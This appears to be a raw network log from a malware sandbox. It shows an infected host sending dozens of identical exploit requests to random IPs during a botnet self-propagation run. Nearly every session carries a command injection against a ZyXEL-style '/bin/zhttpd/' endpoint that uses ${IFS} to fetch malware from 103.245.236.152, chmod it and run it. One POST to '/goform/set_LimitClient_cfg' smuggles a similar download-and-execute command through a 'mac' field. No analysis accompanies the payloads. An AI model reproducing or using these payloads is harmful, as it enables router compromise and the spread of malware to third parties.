                                      Jan 14, 2024 15:50:36.052222967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1769192.168.2.1444568156.29.30.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052251101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1770192.168.2.145319088.128.4.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052299976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1771192.168.2.1439410184.192.120.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052337885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1772192.168.2.145377620.177.132.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052369118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1773192.168.2.145348483.184.247.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052401066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1774192.168.2.1456092150.211.189.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052453995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1775192.168.2.145757890.252.119.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052495003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1776192.168.2.144521264.137.174.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052553892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1777192.168.2.1433578135.127.16.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052565098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1778192.168.2.145682466.108.118.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052619934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1779192.168.2.143730890.19.104.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052669048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1780192.168.2.14586542.188.82.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052723885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1781192.168.2.1455538126.194.46.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052747011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1782192.168.2.1433734140.44.227.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052798986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1783192.168.2.1446802153.108.9.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052839994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1784192.168.2.1452670163.110.66.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052865028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1785192.168.2.1450064173.246.61.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052901030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1786192.168.2.1440728206.122.249.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.052967072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1787192.168.2.143460084.209.74.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053003073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1788192.168.2.1449400173.104.180.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053071976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1789192.168.2.1460910199.29.29.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053124905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1790192.168.2.144003234.11.209.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053152084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1791192.168.2.14436261.90.41.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053178072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1792192.168.2.145891840.190.116.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053226948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1793192.168.2.1434158174.160.200.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053262949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1794192.168.2.144149268.243.26.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053286076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1795192.168.2.144517017.86.107.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053342104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1796192.168.2.1442930130.66.229.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053376913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1797192.168.2.1447642121.144.52.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053430080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1798192.168.2.1446114212.229.63.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053462982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1799192.168.2.1456072138.59.212.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053492069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1800192.168.2.1435414149.204.218.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053524971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1801192.168.2.1449580110.185.49.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053550005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1802192.168.2.144598019.23.84.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053617954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1803192.168.2.145725677.234.180.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053669930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1804192.168.2.1433856124.158.25.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053693056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1805192.168.2.1437088194.74.64.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053755045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1806192.168.2.143805820.159.59.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053787947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1807192.168.2.1443748205.210.254.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053828001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1808192.168.2.1443180116.144.202.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053869963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1809192.168.2.144914445.121.194.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053898096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1810192.168.2.1444108166.206.6.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053936958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1811192.168.2.1449968111.11.182.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.053994894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1812192.168.2.145055681.54.59.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054028988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1813192.168.2.144092014.82.143.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054076910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1814192.168.2.1437564107.170.121.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054120064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1815192.168.2.1459134116.216.255.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054161072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1816192.168.2.1452156165.100.158.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054191113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1817192.168.2.1437526150.166.196.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054220915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1818192.168.2.1432984210.138.142.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054259062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1819192.168.2.1453410135.8.176.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054308891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1820192.168.2.145199024.11.18.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054344893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1821192.168.2.1458130133.171.180.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054377079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1822192.168.2.1438166165.88.222.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054430008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1823192.168.2.145460082.217.69.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.054464102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1824192.168.2.1449824178.193.83.268080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.018505096 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1825192.168.2.144009295.49.58.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067128897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1826192.168.2.145492653.102.108.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067157030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1827192.168.2.1458374155.159.28.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067188978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1828192.168.2.1460660197.190.132.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067249060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1829192.168.2.145031286.220.134.88443
                                      TimestampBytes transferredDirectionData
